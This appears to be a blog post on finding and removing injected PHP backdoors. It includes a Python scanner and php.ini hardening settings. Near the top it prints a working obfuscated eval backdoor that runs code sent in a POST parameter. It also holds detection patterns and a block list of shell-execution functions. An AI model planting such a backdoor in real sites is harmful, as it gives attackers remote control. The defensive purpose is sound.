How to protect a website from a base64 attack

If you find code at the top of your index.php or any other PHP file that you didn't put there, your website has been hacked and the attacker is now able to do anything with it.

The bad code looks something like this:


<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qfb7264'])){eval(${$s20}['qfb7264']);}?>

Or.


<?php eval(base64_decode("SGVsbG8gZ3V5cy4geW91ciB3ZWJzaXRlIGhhc2UgYmVlbiBoYWNrZWQu"));?>

The base64 string in this example decodes to: 'Hello guys. your website hase been hacked'. In a real attack the decoded text is PHP code, which eval() then runs.

And now the question is, how do I stop it?

Manually clean your files

  • To clean the files, first download all the files from the server to your computer.
  • Open the files in a text editor and remove the bad code from the top of every page.
  • Now save the files and upload them to your server.
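
One way to find the infected files in the downloaded copy before editing them by hand, as an added example that is not part of the original post: a small Python scanner. Its three patterns are assumptions modelled on the two snippets shown above, and the sample files are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics for the two injected snippets shown above (assumed patterns; tune per site).
PATTERNS = {
    "eval(base64_decode(...))": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    "eval of a variable variable": re.compile(r"eval\s*\(\s*\$\{\s*\$\w+\s*\}\s*\[", re.I),
    "name built char by char": re.compile(r"strtoupper\s*\(\s*\$\w+\[\d+\]\s*\.", re.I),
}

# Constructed sample site: the two snippets from this page plus one clean file.
SAMPLE_FILES = {
    "index.php": r'''<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qfb7264'])){eval(${$s20}['qfb7264']);}?>
<?php echo "home page"; ?>''',
    "inc/footer.php": r'''<?php eval(base64_decode("SGVsbG8gZ3V5cy4geW91ciB3ZWJzaXRlIGhhc2UgYmVlbiBoYWNrZWQu"));?>
<p>footer</p>''',
    "inc/thumb.php": r'''<?php $img = base64_decode($row["thumb"]); echo strlen($img); ?>''',
}

def scan_text(text):
    """Return the names of every heuristic that matches this PHP source."""
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

def scan_tree(root):
    """Scan all *.php files under root; return {relative path: [matched heuristics]}."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def build_sample_site(root):
    """Write SAMPLE_FILES under root so the scanner can be tried offline."""
    for rel, body in SAMPLE_FILES.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        for name, hits in scan_tree(site).items():
            print(f"{name}: {', '.join(hits)}")
```

Point scan_tree at the folder you downloaded from the server. A file that only calls base64_decode without eval, like inc/thumb.php in the sample, is not flagged.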

Preventing future base64 attacks

To prevent future attacks, you have to disable all the dangerous functions in php.ini.

Add the code below to your php.ini.


allow_url_fopen = Off
allow_url_include = Off
; register_globals only exists before PHP 5.4, where it was removed
register_globals = Off
; eval is a language construct, not a function, so disable_functions does not block it
disable_functions = "shell_exec, eval, exec, system, proc_get_status, inject_code, proc_nice, proc_open, proc_terminate, apache_child_terminate, apache_setenv, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, popen, escapeshellcmd, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, syslog, xmlrpc_entity_decode, proc_close, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, passthru, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, mysql_pconnect, escapeshellarg, highlight_file, define_syslog_variables, ini_restore, ini_alter, ini_get_all, openlog"

Now restart Apache for the changes to take effect.

Note: The above changes will disable the functions that make PHP vulnerable. However, if your application uses any of them, you will have to either find another solution or enable the functions that you need.

1 comment :

  1. nice sir....... thanks for this type of post............
